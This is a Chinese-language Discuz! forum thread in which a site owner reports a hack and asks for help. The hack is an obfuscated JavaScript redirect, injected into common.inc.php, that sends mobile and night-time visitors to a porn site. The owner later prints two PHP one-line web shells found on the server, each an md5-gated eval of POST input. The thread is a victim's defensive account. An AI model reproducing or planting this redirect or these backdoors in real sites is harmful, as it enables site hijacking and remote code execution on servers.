Discuz! 官方站

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

查看: 1104|回复: 15

[求助] 黑客在dz7.2中的common.inc.php中加了转向语句,导致我论坛被跳转到黄色网站

[复制链接]
发表于 2019-3-13 17:04:43 | 显示全部楼层 |阅读模式
我一开始估计,黑客是利用dz7.2的绕过全局变量漏洞,进行改写common.inc.php文件的。于是我就把liunux主机中的php.ini中的request_order值,由默认的GP,调整为GPC。但是这个改动并没有起到作用,黑客攻击依然。

目前暂时我的处理,是把common.inc.php文件设置为只读。这几天来还没有黑过。正在观察中。

但是即使黑客不能使得论坛跳转了,问题的根结还在。黑客还可以随意修改我的文件。

想问下大家,黑客是怎么做到的?怎么能防御这个攻击。


附黑客在common.inc.php中增加的跳转语句:
<script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script><script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script><script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script><script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script><script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script>
 楼主| 发表于 2019-3-13 17:06:55 | 显示全部楼层
这个黄色网站,是推广一个黄色播放器的。 由于这个播放器只能在手机上播放,黑客在语句中,还巧妙的加入了只针对手机进行跳转,用电脑访问,则正常。

我发现已经有好多论坛被黑了,都是一伙人干的。
回复

使用道具 举报

发表于 2019-3-13 17:18:22 | 显示全部楼层
是服务器被挂马了 不止这个文件 应该还有很多隐藏木马
回复

使用道具 举报

 楼主| 发表于 2019-3-13 17:29:49 | 显示全部楼层
crx349 发表于 2019-3-13 17:18
是服务器被挂马了 不止这个文件 应该还有很多隐藏木马

dz的后台文件校验,另一个被加了转向语句的是slide.js文件。  别的就再没有了。  
我看主要起跳转作用的就是common.inc.php这个文件,所以就没有在主贴中反映。

如果被挂马的话,那么黑客是怎么做到的呢?  即使这个木马被查出来,但是挂马的原因查不出,他下一次还是会挂马啊。

我所知的,黑客应该是使用“一句话”漏洞,但是不知他为何能取得这么大的权限的。
回复

使用道具 举报

 楼主| 发表于 2019-3-14 13:12:31 | 显示全部楼层
顶一下了。 希望官方也能帮帮忙。 感觉这不是孤立事件,因为有好多论坛都被这样黑了。
回复

使用道具 举报

发表于 2019-3-14 14:55:38 | 显示全部楼层
zbhsc 发表于 2019-3-13 17:29
dz的后台文件校验,另一个被加了转向语句的是slide.js文件。  别的就再没有了。  
我看主要起跳转作用的 ...

一句话可以 越权的 服务器没限制 就可以 做好安全防护是第一要务哦
回复

使用道具 举报

头像被屏蔽
发表于 2019-3-14 18:08:58 | 显示全部楼层
提示: 该帖被管理员或版主屏蔽
回复

使用道具 举报

 楼主| 发表于 2019-3-16 13:11:48 | 显示全部楼层
mR.耗子 发表于 2019-3-14 18:08
专业清理木马  可以联系 我的QQ交谈 有偿服务 效果好~专业

你们这种人里有骗子啊。 我被你们这些留qq的骗过,删除了我所有数据,幸亏我留了备份。
回复

使用道具 举报

 楼主| 发表于 2019-3-16 13:14:50 | 显示全部楼层
已经找到木马文件了。删除了木马文件,希望以后不会再被骚扰了。

木马文件就是这样的简单语句。
一个木马文件里是这个:
<?php if(md5($_GET['cmd'])=='50247d92877126ad5eccd526d1926521'){@eval($safe="$_POST[helensb]");}?>

一个木马文件里是这个:
<script language='php'>if(md5($_GET['cmd'])=='202cb962ac59075b964b07152d234b70'){@eval($safe="$_POST[a]");}</script>

大家有兴趣的可以把这个加密翻译一下。
回复

使用道具 举报

 楼主| 发表于 2019-3-16 13:17:52 | 显示全部楼层
感谢坛友“kinglaurel”的总结帖:http://www.discuz.net/thread-2579944-1-1.html,让我打开了思路,把论坛文件下载下来,然后用木马扫描程序进行扫描。找到了木马。(ps:kinglaurel贴中提供的木马扫描程序没法用了,要重新下载个)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|Comsenz ( 粤B2-20090059-165 )star

GMT+8, 2019-6-26 05:47

Powered by Discuz! X3.3

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表